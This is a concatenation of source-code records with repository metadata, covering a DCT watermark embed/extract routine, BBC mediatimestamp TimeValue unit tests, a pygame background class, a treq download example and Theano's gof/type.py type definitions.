while cc > 0:
if cc <= 8 and cr <= 8:
idx[i] = (cc - 1) * 8 + cr
i += 1
cc -= 1
cr += 1
return idx - 1 # Subtract 1 to all items because index starts from 0
def _embed_msg(self) -> np.array:
'''
Embed the given message to a DCT of a block and construct a
watermarked block
:param dct: DCT of a micro block
:param msg: binary message to embed
:return: watermarked block
'''
dct_arr, msg_arr = self._dct_coef.flatten(), self._msg
w_blk = np.zeros(len(dct_arr), dtype=np.float32)
msg_idx = 0
for i in range(len(dct_arr)):
idx = self._zigzag[i]
e_cap = self._e_cap[idx]
dct = dct_arr[idx]
if not e_cap == 0:
msg_part = msg_arr[msg_idx:msg_idx + e_cap]
msg_idx += e_cap
# If chromosome is True, add 1 to integer part
int_part = int(dct)
float_part = dct - int_part
dec = Utils.dec_to_binarr(abs(int_part), 8)
# Add msg_part in xxx000xx in the middle of the DCT
dec[EMB_SHIFT:e_cap + EMB_SHIFT] = msg_part
if dct < 0:
dct = float_part - Utils.binarr_to_dec(dec)
else:
dct = float_part + Utils.binarr_to_dec(dec)
w_blk[idx] = dct
return w_blk.reshape(8,8)
def _extract_msg(self, dct: np.array) -> np.array:
'''
Extract a message embedded in the given DCT array of a block
:param dct: DCT of a block
:return: extracted message in binary form
'''
msg_arr = []
dct_arr = dct.flatten()
for i in range(len(dct_arr)):
idx = self._zigzag[i]
e_cap = self._e_cap[idx]
dct = dct_arr[idx]
if not e_cap == 0:
dec = Utils.dec_to_binarr(abs(int(dct)), 8)
msg_part = dec[EMB_SHIFT:e_cap + EMB_SHIFT]
msg_arr.extend(msg_part)
return msg_arr
| 34.052632
| 80
| 0.531685
|
4a11056ea3e00b662c62e76a13a616565de24458
| 11,805
|
py
|
Python
|
tests/test_time_value.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | 3
|
2018-09-07T01:26:08.000Z
|
2019-09-13T12:37:50.000Z
|
tests/test_time_value.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | 16
|
2018-08-17T09:27:43.000Z
|
2022-02-04T17:26:21.000Z
|
tests/test_time_value.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 British Broadcasting Corporation
#
# This is an internal BBC tool and is not licensed externally
# If you have received a copy of this erroneously then you do
# not have permission to reproduce it.
import unittest
from fractions import Fraction
from mediatimestamp import (
TimeOffset,
Timestamp,
SupportsMediaTimeOffset,
mediatimeoffset,
SupportsMediaTimestamp,
mediatimestamp,
TimeValue)
class TestTimeValue(unittest.TestCase):
def test_from_int(self):
tv = TimeValue(100, rate=Fraction(25))
self.assertEqual(tv.value, 100)
self.assertEqual(tv.rate, Fraction(25))
def test_from_timeoffset(self):
tv = TimeValue(TimeOffset(4), rate=None)
self.assertEqual(tv.value, TimeOffset(4))
self.assertIsNone(tv.rate)
def test_from_timestamp(self):
tv = TimeValue(Timestamp(4), rate=None)
self.assertEqual(tv.value, Timestamp(4))
self.assertIsNone(tv.rate)
def test_from_timevalue(self):
tv_in = TimeValue(100, rate=Fraction(25))
tv = TimeValue(tv_in)
self.assertEqual(tv.value, 100)
self.assertEqual(tv.rate, Fraction(25))
def test_from_timeoffset_to_count(self):
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
self.assertIsInstance(tv.value, int)
self.assertEqual(tv.value, 100)
self.assertEqual(tv.rate, Fraction(25))
def test_from_timevalue_rate_change(self):
tv_in = TimeValue(100, rate=Fraction(25))
tv = TimeValue(tv_in, rate=Fraction(100))
self.assertEqual(tv.value, 400)
self.assertEqual(tv.rate, Fraction(100))
def test_unsupported_type(self):
with self.assertRaises(TypeError):
TimeValue(str(10))
def test_as_timeoffset(self):
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
to = tv.as_timeoffset()
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
tv = TimeValue(Timestamp(4), rate=Fraction(25))
to = tv.as_timeoffset()
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
tv = TimeValue(100, rate=Fraction(25))
to = tv.as_timeoffset()
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
def test_mediatimeoffset(self):
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimeOffset)
to = mediatimeoffset(tv)
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
tv = TimeValue(Timestamp(4), rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimeOffset)
to = mediatimeoffset(tv)
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
tv = TimeValue(100, rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimeOffset)
to = mediatimeoffset(tv)
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
def test_as_timestamp(self):
tv = TimeValue(Timestamp(4), rate=Fraction(25))
ts = tv.as_timestamp()
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
ts = tv.as_timestamp()
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
tv = TimeValue(100, rate=Fraction(25))
ts = tv.as_timestamp()
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
def test_mediatimestamp(self):
tv = TimeValue(Timestamp(4), rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimestamp)
ts = mediatimestamp(tv)
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimestamp)
ts = mediatimestamp(tv)
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
tv = TimeValue(100, rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimestamp)
ts = mediatimestamp(tv)
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
def test_as_count(self):
tv = TimeValue(100)
ct = tv.as_count()
self.assertEqual(ct, 100)
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
ct = tv.as_count()
self.assertEqual(ct, 100)
def test_as_but_no_rate(self):
tv = TimeValue(TimeOffset(4))
with self.assertRaises(ValueError):
tv.as_count()
tv = TimeValue(100)
with self.assertRaises(ValueError):
tv.as_timeoffset()
def test_from_str(self):
cases = [
("-100", TimeValue(-100)),
("0", TimeValue(0)),
("100", TimeValue(100)),
("100@25", TimeValue(100, rate=Fraction(25))),
("100@30000/1001", TimeValue(100, rate=Fraction(30000, 1001))),
("-4:0", TimeValue(TimeOffset(4, sign=-1))),
("0:0", TimeValue(TimeOffset(0))),
("4:0", TimeValue(TimeOffset(4))),
("4:0@25", TimeValue(100, rate=Fraction(25))),
("4:0@30000/1001", TimeValue(120, rate=Fraction(30000, 1001))),
]
for case in cases:
with self.subTest(case=case):
self.assertEqual(TimeValue.from_str(case[0]), case[1])
def test_from_str_rate(self):
tv = TimeValue.from_str("100@25", rate=Fraction(100))
self.assertEqual(tv, TimeValue(100, rate=Fraction(25)))
tv = TimeValue.from_str("100", rate=Fraction(100))
self.assertEqual(tv, TimeValue(100, rate=Fraction(100)))
def test_from_str_invalid(self):
cases = [
"100@25@",
"100/30000/1001",
"abc",
]
for case in cases:
with self.subTest(case=case):
with self.assertRaises(ValueError):
TimeValue.from_str(case)
def test_to_str(self):
cases = [
("-100", TimeValue(-100), True),
("0", TimeValue(0), True),
("100", TimeValue(100), True),
("100@25", TimeValue(100, rate=Fraction(25)), True),
("100", TimeValue(100, rate=Fraction(25)), False),
("100@30000/1001", TimeValue(100, rate=Fraction(30000, 1001)), True),
("-4:0", TimeValue(TimeOffset(4, sign=-1)), True),
("0:0", TimeValue(TimeOffset(0)), True),
("4:0", TimeValue(TimeOffset(4)), True),
]
for case in cases:
with self.subTest(case=case):
self.assertEqual(case[0], case[1].to_str(include_rate=case[2]))
self.assertEqual(case[1].to_str(), str(case[1]))
def test_compare(self):
self.assertEqual(TimeValue(1), TimeValue(1))
self.assertNotEqual(TimeValue(1), TimeValue(2))
self.assertLess(TimeValue(1), TimeValue(2))
self.assertLessEqual(TimeValue(1), TimeValue(1))
self.assertGreater(TimeValue(2), TimeValue(1))
self.assertGreaterEqual(TimeValue(2), TimeValue(2))
self.assertNotEqual(TimeValue(2), TimeValue(3))
self.assertEqual(TimeValue(TimeOffset(4)), TimeValue(TimeOffset(4)))
def test_compare_with_convert(self):
self.assertEqual(TimeValue(100, rate=Fraction(25)), TimeValue(TimeOffset(4)))
self.assertEqual(TimeValue(TimeOffset(4)), TimeValue(100, rate=Fraction(25)))
def test_compare_no_rate(self):
with self.assertRaises(ValueError):
TimeValue(100) == TimeValue(TimeOffset(4))
def test_equality_none(self):
none_value = None
self.assertFalse(TimeValue(1) == none_value)
self.assertTrue(TimeValue(1) != none_value)
def test_addsub(self):
cases = [
(TimeValue(50), '+', TimeValue(50),
TimeValue(100)),
(TimeValue(50, rate=Fraction(25)), '+', TimeValue(TimeOffset(2)),
TimeValue(100, rate=Fraction(25))),
(TimeValue(TimeOffset(2)), '+', TimeValue(TimeOffset(2)),
TimeValue(TimeOffset(4))),
(TimeValue(50), '-', TimeValue(50),
TimeValue(0)),
(TimeValue(50, rate=Fraction(25)), '-', TimeValue(TimeOffset(2)),
TimeValue(0, rate=Fraction(25))),
(TimeValue(TimeOffset(2)), '-', TimeValue(TimeOffset(2)),
TimeValue(TimeOffset(0))),
]
for case in cases:
with self.subTest(case=case):
if case[1] == '+':
result = case[0] + case[2]
else:
result = case[0] - case[2]
self.assertEqual(result, case[3],
msg="{!r} {} {!r} = {!r}, expected {!r}".format(
case[0], case[1], case[2], result, case[3]))
def test_addsub_no_rate(self):
cases = [
(TimeValue(50), '+', TimeValue(TimeOffset(2))),
(TimeValue(TimeOffset(2)), '+', TimeValue(50)),
(TimeValue(50), '-', TimeValue(TimeOffset(2))),
(TimeValue(TimeOffset(2)), '-', TimeValue(50)),
]
for case in cases:
with self.subTest(case=case):
with self.assertRaises(ValueError):
if case[1] == '+':
case[0] + case[2]
else:
case[0] - case[2]
def test_multdiv(self):
cases = [
(TimeValue(50), '*', 2,
TimeValue(100)),
(TimeValue(TimeOffset(2)), '*', 2,
TimeValue(TimeOffset(4))),
(2, '*', TimeValue(50),
TimeValue(100)),
(2, '*', TimeValue(TimeOffset(2)),
TimeValue(TimeOffset(4))),
(TimeValue(50), '/', 2,
TimeValue(25)),
(TimeValue(TimeOffset(2)), '/', 2,
TimeValue(TimeOffset(1))),
(TimeValue(25), '/', 2,
TimeValue(12)),
(TimeValue(25), '//', 2,
TimeValue(12)),
]
for case in cases:
with self.subTest(case=case):
if case[1] == '*':
result = case[0] * case[2]
elif case[1] == '/':
result = case[0] / case[2]
else:
result = case[0] // case[2]
self.assertEqual(result, case[3],
msg="{!r} {} {!r} = {!r}, expected {!r}".format(
case[0], case[1], case[2], result, case[3]))
def test_multdiv_not_int(self):
cases = [
(TimeValue(50), '*', TimeValue(50)),
(TimeValue(50), '/', TimeValue(50)),
(TimeValue(50), '//', TimeValue(50)),
]
for case in cases:
with self.subTest(case=case):
with self.assertRaises(TypeError):
if case[1] == '*':
case[0] * case[2]
elif case[1] == '/':
case[0] / case[2]
else:
case[0] // case[2]
def test_immutable(self):
tv = TimeValue(0)
with self.assertRaises(ValueError):
tv._value = 1
with self.assertRaises(ValueError):
tv._rate = Fraction(50)
def test_hashable(self):
tv1 = TimeValue(0)
tv2 = TimeValue.from_str("0:20000000000@50")
self.assertNotEqual(hash(tv1), hash(tv2))
| 34.823009
| 85
| 0.557645
|
4a1105d1512c135df92938d058bf57907992b708
| 644
|
py
|
Python
|
data/modules/graphic/two_D/background.py
|
Sheidaas/gamee
|
434db4648e1719a648b8784f201b03b4c8e243c3
|
[
"CC-BY-3.0"
] | null | null | null |
data/modules/graphic/two_D/background.py
|
Sheidaas/gamee
|
434db4648e1719a648b8784f201b03b4c8e243c3
|
[
"CC-BY-3.0"
] | null | null | null |
data/modules/graphic/two_D/background.py
|
Sheidaas/gamee
|
434db4648e1719a648b8784f201b03b4c8e243c3
|
[
"CC-BY-3.0"
] | null | null | null |
import pygame
class Background:
def __init__(self, x1, y1, x2, y2, color: tuple, screen):
self.size = (x1 * screen.engine.settings.graphic['screen']['resolution_scale'][0],
y1 * screen.engine.settings.graphic['screen']['resolution_scale'][1],
x2 * screen.engine.settings.graphic['screen']['resolution_scale'][0],
y2 * screen.engine.settings.graphic['screen']['resolution_scale'][1])
self.color = color
self.rect = None
self.screen = screen
def render_background(self):
pygame.draw.rect(self.screen.screen, self.color, self.size)
| 37.882353
| 90
| 0.613354
|
4a11074c4bcf0b7bf6856fb6245dfac00a6db776
| 358
|
py
|
Python
|
docs/examples/download_file.py
|
chevah/treq
|
2d45c8227246583bc96cb4924722d9f79e95d4d7
|
[
"MIT"
] | null | null | null |
docs/examples/download_file.py
|
chevah/treq
|
2d45c8227246583bc96cb4924722d9f79e95d4d7
|
[
"MIT"
] | null | null | null |
docs/examples/download_file.py
|
chevah/treq
|
2d45c8227246583bc96cb4924722d9f79e95d4d7
|
[
"MIT"
] | null | null | null |
from twisted.internet.task import react
import treq
def download_file(reactor, url, destination_filename):
destination = open(destination_filename, 'wb')
d = treq.get(url)
d.addCallback(treq.collect, destination.write)
d.addBoth(lambda _: destination.close())
return d
react(download_file, ['http://httpbin.org/get', 'download.txt'])
| 25.571429
| 64
| 0.72905
|
4a110778dbe7cfb7b3fdad3984fe323a059fa7ec
| 21,081
|
py
|
Python
|
theano/gof/type.py
|
c0g/Theano
|
ef6f32d1b7a575b6153c0ca2e4347b39e766c412
|
[
"BSD-3-Clause"
] | null | null | null |
theano/gof/type.py
|
c0g/Theano
|
ef6f32d1b7a575b6153c0ca2e4347b39e766c412
|
[
"BSD-3-Clause"
] | null | null | null |
theano/gof/type.py
|
c0g/Theano
|
ef6f32d1b7a575b6153c0ca2e4347b39e766c412
|
[
"BSD-3-Clause"
] | null | null | null |
"""WRITEME Defines the `Type` class."""
__docformat__ = "restructuredtext en"
from theano.compat import PY3
from theano.gof import utils
from theano.gof.utils import MethodNotDefined, object2
from theano.gof import graph
########
# Type #
########
from theano.gof.op import CLinkerObject
class CLinkerType(CLinkerObject):
"""Interface specification for Types that can be arguments to a `CLinkerOp`.
A CLinkerType instance is mainly reponsible for providing the C code that
interfaces python objects with a C `CLinkerOp` implementation.
See WRITEME for a general overview of code generation by `CLinker`.
"""
def c_is_simple(self):
"""Optional: Return True for small or builtin C types.
A hint to tell the compiler that this type is a builtin C type or a
small struct and that its memory footprint is negligible. Simple
objects may be passed on the stack.
"""
return False
def c_literal(self, data):
"""Optional: WRITEME
:Parameters:
- `data`: WRITEME
WRITEME
:Exceptions:
- `MethodNotDefined`: Subclass does not implement this method
"""
raise MethodNotDefined("c_literal", type(self), self.__class__.__name__)
def c_declare(self, name, sub, check_input=True):
"""Required: Return c code to declare variables that will be
instantiated by `c_extract`.
Example:
.. code-block: python
return "PyObject ** addr_of_%(name)s;"
:param name: the name of the ``PyObject *`` pointer that will the value for this Type
:type name: string
:param sub: a dictionary of special codes. Most importantly
sub['fail']. See CLinker for more info on `sub` and ``fail``.
:type sub: dict string -> string
:note: It is important to include the `name` inside of variables which
are declared here, so that name collisions do not occur in the
source file that is generated.
:note: The variable called ``name`` is not necessarily defined yet
where this code is inserted. This code might be inserted to
create class variables for example, whereas the variable ``name``
might only exist inside certain functions in that class.
:todo: Why should variable declaration fail? Is it even allowed to?
:Exceptions:
- `MethodNotDefined`: Subclass does not implement this method
"""
raise MethodNotDefined()
def c_init(self, name, sub):
"""Required: Return c code to initialize the variables that were declared by
self.c_declare()
Example:
.. code-block: python
return "addr_of_%(name)s = NULL;"
:note: The variable called ``name`` is not necessarily defined yet
where this code is inserted. This code might be inserted in a
class constructor for example, whereas the variable ``name``
might only exist inside certain functions in that class.
:todo: Why should variable initialization fail? Is it even allowed to?
"""
raise MethodNotDefined("c_init", type(self), self.__class__.__name__)
def c_extract(self, name, sub, check_input=True):
"""Required: Return c code to extract a PyObject * instance.
The code returned from this function must be templated using
``%(name)s``, representing the name that the caller wants to
call this `Variable`. The Python object self.data is in a
variable called "py_%(name)s" and this code must set the
variables declared by c_declare to something representative
of py_%(name)s. If the data is improper, set an appropriate
exception and insert "%(fail)s".
:todo: Point out that template filling (via sub) is now performed
by this function. --jpt
Example:
.. code-block: python
return "if (py_%(name)s == Py_None)" + \\\
addr_of_%(name)s = &py_%(name)s;" + \\\
"else" + \\\
{ PyErr_SetString(PyExc_ValueError, \\\
'was expecting None'); %(fail)s;}"
:param name: the name of the ``PyObject *`` pointer that will
store the value for this Type
:type name: string
:param sub: a dictionary of special codes. Most importantly
sub['fail']. See CLinker for more info on `sub` and ``fail``.
:type sub: dict string -> string
:Exceptions:
- `MethodNotDefined`: Subclass does not implement this method
"""
raise MethodNotDefined("c_extract", type(self), self.__class__.__name__)
def c_extract_out(self, name, sub, check_input=True):
"""Optional: C code to extract a PyObject * instance.
Unlike c_extract, c_extract_out has to accept Py_None,
meaning that the variable should be left uninitialized.
"""
return """
if (py_%(name)s == Py_None)
{
%(c_init_code)s
}
else
{
%(c_extract_code)s
}
""" % dict(
name=name,
c_init_code=self.c_init(name, sub),
c_extract_code=self.c_extract(name, sub, check_input))
def c_cleanup(self, name, sub):
"""Return c code to clean up after `c_extract`.
This returns C code that should deallocate whatever `c_extract`
allocated or decrease the reference counts. Do not decrease
py_%(name)s's reference count.
WRITEME
:Parameters:
- `name`: WRITEME
WRITEME
- `sub`: WRITEME
WRITEME
:Exceptions:
- `MethodNotDefined`: Subclass does not implement this method
"""
raise MethodNotDefined()
def c_sync(self, name, sub):
"""Required: Return c code to pack C types back into a PyObject.
The code returned from this function must be templated using "%(name)s",
representing the name that the caller wants to call this Variable. The
returned code may set "py_%(name)s" to a PyObject* and that PyObject*
will be accessible from Python via variable.data. Do not forget to adjust
reference counts if "py_%(name)s" is changed from its original value.
:Parameters:
- `name`: WRITEME
WRITEME
- `sub`: WRITEME
WRITEME
:Exceptions:
- `MethodNotDefined`: Subclass does not implement this method
"""
raise MethodNotDefined("c_sync", type(self), self.__class__.__name__)
def c_code_cache_version(self):
"""Return a tuple of integers indicating the version of this Type.
An empty tuple indicates an 'unversioned' Type that will not be cached between processes.
The cache mechanism may erase cached modules that have been superceded by newer
versions. See `ModuleCache` for details.
"""
return ()
class PureType(object):
"""Interface specification for variable type instances.
A :term:`Type` instance is mainly reponsible for two things:
- creating `Variable` instances (conventionally, `__call__` does this), and
- filtering a value assigned to a `Variable` so that the value conforms to restrictions
imposed by the type (also known as casting, this is done by `filter`),
"""
Variable = graph.Variable #the type that will be created by call to make_variable.
Constant = graph.Constant #the type that will be created by call to make_constant
def filter(self, data, strict=False, allow_downcast=None):
"""Required: Return data or an appropriately wrapped/converted data.
Subclass implementation should raise a TypeError exception if the data is not of an
acceptable type.
If strict is True, the data returned must be the same as the
data passed as an argument. If it is False, and allow_downcast
is True, filter may cast it to an appropriate type. If
allow_downcast is False, filter may only upcast it, not lose
precision. If allow_downcast is None (default), the behaviour can be
Type-dependent, but for now it means only Python floats can be
downcasted, and only to floatX scalars.
:Exceptions:
- `MethodNotDefined`: subclass doesn't implement this function.
"""
raise MethodNotDefined("filter", type(self), self.__class__.__name__)
# If filter_inplace is defined, it will be called instead of
# filter() This is to allow reusing the old allocated memory. As
# of this writing this is used only when we transfer new data to a
# shared variable on the gpu.
#def filter_inplace(value, storage, strict=False, allow_downcast=None)
def filter_variable(self, other):
"""Convert a symbolic variable into this Type, if compatible.
For the moment, the only Types compatible with one another are
TensorType and CudaNdarrayType, provided they have the same
number of dimensions, same broadcasting pattern, and same dtype.
If Types are not compatible, a TypeError should be raised.
"""
if not isinstance(other, graph.Variable):
# The value is not a Variable: we cast it into
# a Constant of the appropriate Type.
other = self.Constant(type=self, data=other)
if other.type != self:
raise TypeError(
'Cannot convert Type %(othertype)s '
'(of Variable %(other)s) into Type %(self)s. '
'You can try to manually convert %(other)s into a %(self)s.'
% dict(
othertype=other.type,
other=other,
self=self)
)
return other
def is_valid_value(self, a):
"""Required: Return True for any python object `a` that would be a legal value for a Variable of this Type"""
try:
self.filter(a, strict=True)
return True
except (TypeError, ValueError):
return False
def value_validity_msg(self, a):
"""Optional: return a message explaining the output of is_valid_value"""
return "none"
def make_variable(self, name = None):
"""Return a new `Variable` instance of Type `self`.
:Parameters:
- `name`: None or str
A pretty string for printing and debugging.
"""
return self.Variable(self, name = name)
def make_constant(self, value, name=None):
return self.Constant(type=self, data=value, name=name)
def __call__(self, name=None):
"""Return a new `Variable` instance of Type `self`.
:Parameters:
- `name`: None or str
A pretty string for printing and debugging.
"""
return utils.add_tag_trace(self.make_variable(name))
def values_eq(self, a, b):
"""
Return True if a and b can be considered exactly equal.
a and b are assumed to be valid values of this Type.
"""
return a == b
def values_eq_approx(self, a, b):
"""
Return True if a and b can be considered approximately equal.
:param a: a potential value for a Variable of this Type.
:param b: a potential value for a Variable of this Type.
:rtype: Bool
This function is used by theano debugging tools to decide
whether two values are equivalent, admitting a certain amount
of numerical instability. For example, for floating-point
numbers this function should be an approximate comparison.
By default, this does an exact comparison.
"""
return self.values_eq(a, b)
# def get_shape_info(self, obj):
"""
Optional function. See TensorType().get_shape_info for definition
"""
# def get_size(self, shape_info):
"""
Optional function. See TensorType().get_size for definition
"""
_nothing = """
"""
class Type(object2, PureType, CLinkerType):
"""Convenience wrapper combining `PureType` and `CLinkerType`.
Theano comes with several subclasses of such as:
- `Generic`: for any python type
- `TensorType`: for numpy.ndarray
- `SparseType`: for scipy.sparse
But you are encouraged to write your own, as described in WRITEME.
The following following code illustrates the use of a Type instance, here tensor.fvector:
.. code-block:: python
# Declare a symbolic floating-point vector using __call__
b = tensor.fvector()
# Create a second Variable with the same Type instance
c = tensor.fvector()
Whenever you create a symbolic variable in theano (technically, `Variable`) it will contain a
reference to a Type instance. That reference is typically constant during the lifetime of
the Variable. Many variables can refer to a single Type instance, as do b and c above. The
Type instance defines the kind of value which might end up in that variable when executing
a `Function`. In this sense, theano is like a strongly-typed language because the types
are included in the graph before the values. In our example above, b is a Variable which is
guaranteed to correspond to a numpy.ndarray of rank 1 when we try to do some computations
with it.
Many `Op` instances will raise an exception if they are applied to inputs with incorrect
types. Type references are also useful to do type-checking in pattern-based optimizations.
"""
def convert_variable(self, var):
"""Patch variable so that its type will match self, if possible.
If the variable can't be converted, this should return None.
The conversion can only happen if the following implication is
true for all possible `val`.
self.is_valid_value(val) => var.type.is_valid_value(val)
For the majority of types this means that you can only have
non-broadcastable dimensions become broadcastable and not the
inverse.
The default is to not convert anything which is always safe.
"""
return None
class SingletonType(Type):
"""Convenient Base class for a Type subclass with no attributes
It saves having to implement __eq__ and __hash__
"""
__instance = None
def __new__(cls):
# If sub-subclass of SingletonType don't redeclare __instance
# when we look for it, we will find it in the subclass. We
# don't want that, so we check the class. When we add one, we
# add one only to the current class, so all is working
# correctly.
if cls.__instance is None or not isinstance(cls.__instance, cls):
cls.__instance = Type.__new__(cls)
return cls.__instance
def __str__(self):
return self.__class__.__name__
# even if we try to make a singleton, this do not always work. So
# we compare the type. See test_type_other.test_none_Constant for
# an exmple. So we need to implement __eq__ and __hash__
def __eq__(self, other):
if self is other:
return True
if type(self) is type(other):
return True
return False
def __hash__(self):
return hash(type(self))
class Generic(SingletonType):
"""
Represents a generic Python object.
This class implements the `PureType` and `CLinkerType` interfaces for generic PyObject
instances.
EXAMPLE of what this means, or when you would use this type.
WRITEME
"""
def filter(self, data, strict=False, allow_downcast=None):
return data
def is_valid_value(self, a):
return True
def c_declare(self, name, sub, check_input=True):
return """
PyObject* %(name)s;
""" % locals()
def c_init(self, name, sub):
return """
%(name)s = NULL;
""" % locals()
def c_extract(self, name, sub, check_input=True):
return """
Py_INCREF(py_%(name)s);
%(name)s = py_%(name)s;
""" % locals()
def c_cleanup(self, name, sub):
return """
Py_XDECREF(%(name)s);
""" % locals()
def c_sync(self, name, sub):
return """
assert(py_%(name)s->ob_refcnt > 1);
Py_DECREF(py_%(name)s);
py_%(name)s = %(name)s ? %(name)s : Py_None;
Py_INCREF(py_%(name)s);
""" % locals()
def c_code_cache_version(self):
return (1,)
def __str__(self):
return self.__class__.__name__
generic = Generic()
class CDataType(Type):
"""
Represents opaque C data to be passed around. The intent is to
ease passing arbitrary data between ops C code.
"""
import ctypes
if PY3:
_cdata_type = ctypes.py_object.from_address(
ctypes.addressof(ctypes.pythonapi.PyCapsule_Type)).value
else:
_cdata_type = ctypes.py_object.from_address(
ctypes.addressof(ctypes.pythonapi.PyCObject_Type)).value
del ctypes
def __init__(self, ctype, freefunc=None):
"""
Build a type made to represent a C pointer in theano.
:param ctype: The type of the pointer (complete with the `*`)
:param freefunc: a function to call to free the pointer. This
function must have a `void` return and take a
single pointer argument.
"""
assert isinstance(ctype, basestring)
self.ctype = ctype
if freefunc is not None:
assert isinstance(freefunc, basestring)
self.freefunc = freefunc
def __eq__(self, other):
return (type(self) == type(other) and
self.ctype == other.ctype,
self.freefunc == other.freefunc)
def __hash__(self):
return hash((type(self), self.ctype, self.freefunc))
def filter(self, data, strict=False, allow_downcast=None):
if data is not None and not isinstance(data, self._cdata_type):
raise TypeError("expected None or PyCObject/PyCapsule")
return data
def c_declare(self, name, sub, check_input=True):
return """
%(ctype)s %(name)s;
""" % dict(ctype=self.ctype, name=name)
def c_init(self, name, sub):
return "%(name)s = NULL;" % dict(name=name)
def c_extract(self, name, sub, check_input=True):
if PY3:
s = """
%(name)s = (%(ctype)s)PyCapsule_GetPointer(py_%(name)s, NULL);
if (%(name)s == NULL) %(fail)s
"""
else:
s = """
%(name)s = (%(ctype)s)PyCObject_AsVoidPtr(py_%(name)s);
"""
return s % dict(name=name, ctype=self.ctype, fail=sub['fail'])
def c_support_code(self):
if PY3:
return """
void _py3_destructor(PyObject *o) {
void *d = PyCapsule_GetContext(o);
void *p = PyCapsule_GetPointer(o, NULL);
void (*f)(void *) = (void (*)(void *))d;
if (f != NULL) f(p);
}
"""
else:
return ""
def c_sync(self, name, sub):
freefunc = self.freefunc
if freefunc is None:
freefunc = "NULL"
s = """
Py_XDECREF(py_%(name)s);
if (%(name)s == NULL) {
py_%(name)s = Py_None;
Py_INCREF(py_%(name)s);
} else """
if PY3:
s += """{
py_%(name)s = PyCapsule_New((void *)%(name)s, NULL,
_py3_destructor);
if (py_%(name)s != NULL) {
if (PyCapsule_SetContext(py_%(name)s, (void *)%(freefunc)s) != 0) {
/* This won't trigger a call to freefunc since it could not be
set. The error case below will do it. */
Py_DECREF(py_%(name)s);
/* Signal the error */
py_%(name)s = NULL;
}
}
}"""
else:
s += """{
py_%(name)s = PyCObject_FromVoidPtr((void *)%(name)s,
(void (*)(void *))%(freefunc)s);
}"""
if self.freefunc is not None:
s += """
if (py_%(name)s == NULL) { %(freefunc)s(%(name)s); }
"""
return s % dict(name=name, freefunc=freefunc)
def c_cleanup(self, name, sub):
# No need to do anything here since the CObject/Capsule will
# free the data for us when released.
return ""
def c_code_cache_version(self):
return (2,)
def __str__(self):
return "%s{%s}" % (self.__class__.__name__, self.ctype)
class CDataTypeConstant(graph.Constant):
def signature(self):
# The Op.c_code* methoss can't access the data, so it can't
# change the code depending of it. So there is no need to put
# it in the signature. Also, under Python 2, PyCObject aren't
# pickable. So using the PyCObject in the signature would
# disable the c code cache for op that have it as an input.
return (self.type,)
CDataType.Constant = CDataTypeConstant
| 33.04232
| 117
| 0.618092
|
4a1108207aaa082416d6733da5f86cb9e12d6a58
| 1,529
|
py
|
Python
|
No_0367_Valid Perfect Square/valid_perfect_square_by_newton_method.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | 32
|
2020-01-05T13:37:16.000Z
|
2022-03-26T07:27:09.000Z
|
No_0367_Valid Perfect Square/valid_perfect_square_by_newton_method.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | null | null | null |
No_0367_Valid Perfect Square/valid_perfect_square_by_newton_method.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | 8
|
2020-06-18T16:17:27.000Z
|
2022-03-15T23:58:18.000Z
|
'''
Description:
Given a positive integer num, write a function which returns True if num is a perfect square else False.
Note: Do not use any built-in library function such as sqrt.
Example 1:
Input: 16
Output: true
Example 2:
Input: 14
Output: false
'''
class Solution:
def isPerfectSquare(self, num: int) -> bool:
x_approx = num
# approximate square root, x_approx, by Newton method
while x_approx ** 2 > num:
x_approx = (x_approx + num / x_approx) // 2
return x_approx ** 2 == num
# n : the input value of num.
## Time Complexity: O( log n )
#
# The overhead in time is the cost of Newton method, which is of O( log n ).
## Space Complexity: O( 1 )
#
# The overhead in space is the looping index and temporary arithmetic variable, which is of O( 1 ).
def test_bench():
# expected output:
test_data = [
16, # True
14, # False
24, # False
25, # True
26, # False
35, # False
36, # True
37, # False
1024, # True
2147483647 # False
]
for number in test_data:
print( Solution().isPerfectSquare(number) )
return
if __name__ == '__main__':
test_bench()
| 19.35443
| 104
| 0.483976
|
4a11086e2ffa1509dffac1dac1d912e0dda7ec47
| 99
|
py
|
Python
|
output/models/ms_data/model_groups/mg_c011_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
